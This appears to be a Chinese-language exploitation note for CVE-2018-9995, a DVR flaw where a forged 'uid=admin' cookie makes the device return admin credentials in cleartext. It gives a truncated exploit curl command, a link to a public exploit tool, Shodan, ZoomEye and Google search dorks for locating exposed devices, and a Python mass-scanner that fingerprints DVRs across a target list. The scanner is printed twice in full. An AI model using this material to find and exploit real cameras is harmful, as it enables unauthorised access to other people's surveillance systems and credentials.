### 漏洞描述:
此漏洞(CVE-2018-9995)允许攻击者在请求中将 Cookie 修改为 “Cookie: uid=admin” 后访问特定 DVR 的控制面板,设备随即返回明文的管理员凭证。也就是说,设备仅凭客户端提交的 Cookie 值判定身份,没有进行真正的认证校验。
利用代码:
curl "http://
github已有公开的利用工具:
https://github.com/ezelf/CVE-2018-9995_dvr_credentials
###关键词搜索:
1. zoomeye:
keyword: “/login.rsp"
2.shodan:
keyword:html:"/login.rsp"
keyword:"server:GNU rsp/1.0"
3.google:
keyword:intitle:"DVR login"
###poc利用
cd CVE-2018-9995_dvr_credentials
pip install -r requirements.txt
### 批量验证
DVR 系列摄像头批量检测,使用方法:python CVE-2018-9995_check.py host.txt
其中 host.txt 每行一个目标,内容可以为 8.8.8.8:8080 或者 www.baidu.com;脚本运行后,会把识别为 DVR 系列摄像头的 host 保存到 result.txt 文件里。
注意:脚本只根据 /login.rsp 返回 200 且 Server 响应头包含 "GNU rsp/1.0" 来识别设备指纹,并不验证凭证泄露本身,因此 result.txt 中记录的是待进一步确认的候选设备,而不是已确认存在漏洞的设备。
#author:hzkey
import tableprint as tp
import sys
import requests
import re
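class Colors:
    """ANSI SGR escape sequences used to colour the scanner's console output."""

    GREEN = '\033[32m'
    RED = '\033[0;31m'
    # Was '\033[*]', which is not an SGR colour sequence, so text prefixed
    # with BLUE was never coloured; 34 is the standard foreground blue.
    BLUE = '\033[34m'
    ORANGE = '\033[33m'  # SGR 33 (yellow in the standard palette)
    # Resets all attributes; append after coloured text so the colour does
    # not leak into later terminal output.
    RESET = '\033[0m'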
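def check_host(host):
    """Fingerprint one host as a possible CVE-2018-9995 DVR and record a match.

    Sends a single GET to ``http://<host>/login.rsp`` and treats the host as
    a candidate when the response is HTTP 200 and the ``Server`` header
    contains ``GNU rsp/1.0``. This is a banner match only: it does not test
    the credential disclosure itself, so a hit means "device family
    identified", not "confirmed vulnerable". Matching URLs are appended to
    ``result.txt``.

    Args:
        host: ``host`` or ``host:port`` string, without a scheme.

    Returns:
        True when the fingerprint matched, False otherwise (including on
        network errors). Earlier versions returned None; callers that
        ignore the result are unaffected.
    """
    host = host.strip()
    if not host:
        # A blank entry would otherwise become 'http:///login.rsp'.
        return False

    print(Colors.ORANGE+"Checking : %s"%host)
    url = 'http://' + host+'/login.rsp'
    try:
        rr = requests.get(url, timeout=30, allow_redirects=False)
    except requests.RequestException as exc:
        # Only network/URL failures are expected here. The former bare
        # `except: pass` also swallowed KeyboardInterrupt, so a long batch
        # run could not be stopped with Ctrl-C, and it hid every other bug.
        print(Colors.RED + "[-] %s : %s" % (host, exc.__class__.__name__))
        return False

    # .get() avoids a KeyError when no Server header is sent, and a plain
    # substring test avoids treating '.' in the banner as a regex wildcard.
    banner = rr.headers.get("Server", "")
    if rr.status_code != 200 or "GNU rsp/1.0" not in banner:
        return False

    print(Colors.GREEN+"[*] CVE-2018-9995 Detection :Url is %s"%url)
    try:
        # Context manager closes the handle; the original leaked one per hit.
        with open('result.txt', 'a+') as ff:
            ff.write('%s\n'%(url))
    except OSError as exc:
        # Keep the batch running, but make a lost result visible.
        print(Colors.RED + "[-] could not write result.txt: %s" % exc)
    return True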
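if __name__ == '__main__':
    # Entry point: read one target per line from the file named on the
    # command line and fingerprint each one with check_host().
    if len(sys.argv) < 2:
        print(Colors.BLUE+"""Usage: Python3 CVE-2018-9995.py host.txt
host.txt:127.0.0.1:8080 or baidu.com
""")
        # Non-zero status lets wrappers tell a usage error from a finished run.
        sys.exit(1)

    # `with` closes the target list even if a check raises or the run is
    # interrupted; the original only closed it on the success path.
    with open(sys.argv[1]) as targets:
        for line in targets:
            target = line.strip()
            if not target:
                continue  # skip blank lines instead of probing an empty host
            check_host(target)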
#author:hzkey
import tableprint as tp
import sys
import requests
import re
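class Colors:
    """ANSI SGR escape sequences used to colour the scanner's console output."""

    GREEN = '\033[32m'
    RED = '\033[0;31m'
    # Was '\033[*]', which is not an SGR colour sequence, so text prefixed
    # with BLUE was never coloured; 34 is the standard foreground blue.
    BLUE = '\033[34m'
    ORANGE = '\033[33m'  # SGR 33 (yellow in the standard palette)
    # Resets all attributes; append after coloured text so the colour does
    # not leak into later terminal output.
    RESET = '\033[0m'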
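def check_host(host):
    """Fingerprint one host as a possible CVE-2018-9995 DVR and record a match.

    Sends a single GET to ``http://<host>/login.rsp`` and treats the host as
    a candidate when the response is HTTP 200 and the ``Server`` header
    contains ``GNU rsp/1.0``. This is a banner match only: it does not test
    the credential disclosure itself, so a hit means "device family
    identified", not "confirmed vulnerable". Matching URLs are appended to
    ``result.txt``.

    Args:
        host: ``host`` or ``host:port`` string, without a scheme.

    Returns:
        True when the fingerprint matched, False otherwise (including on
        network errors). Earlier versions returned None; callers that
        ignore the result are unaffected.
    """
    host = host.strip()
    if not host:
        # A blank entry would otherwise become 'http:///login.rsp'.
        return False

    print(Colors.ORANGE+"Checking : %s"%host)
    url = 'http://' + host+'/login.rsp'
    try:
        rr = requests.get(url, timeout=30, allow_redirects=False)
    except requests.RequestException as exc:
        # Only network/URL failures are expected here. The former bare
        # `except: pass` also swallowed KeyboardInterrupt, so a long batch
        # run could not be stopped with Ctrl-C, and it hid every other bug.
        print(Colors.RED + "[-] %s : %s" % (host, exc.__class__.__name__))
        return False

    # .get() avoids a KeyError when no Server header is sent, and a plain
    # substring test avoids treating '.' in the banner as a regex wildcard.
    banner = rr.headers.get("Server", "")
    if rr.status_code != 200 or "GNU rsp/1.0" not in banner:
        return False

    print(Colors.GREEN+"[*] CVE-2018-9995 Detection :Url is %s"%url)
    try:
        # Context manager closes the handle; the original leaked one per hit.
        with open('result.txt', 'a+') as ff:
            ff.write('%s\n'%(url))
    except OSError as exc:
        # Keep the batch running, but make a lost result visible.
        print(Colors.RED + "[-] could not write result.txt: %s" % exc)
    return True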
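if __name__ == '__main__':
    # Entry point: read one target per line from the file named on the
    # command line and fingerprint each one with check_host().
    if len(sys.argv) < 2:
        print(Colors.BLUE+"""Usage: Python3 CVE-2018-9995.py host.txt
host.txt:127.0.0.1:8080 or baidu.com
""")
        # Non-zero status lets wrappers tell a usage error from a finished run.
        sys.exit(1)

    # `with` closes the target list even if a check raises or the run is
    # interrupted; the original only closed it on the success path.
    with open(sys.argv[1]) as targets:
        for line in targets:
            target = line.strip()
            if not target:
                continue  # skip blank lines instead of probing an empty host
            check_host(target)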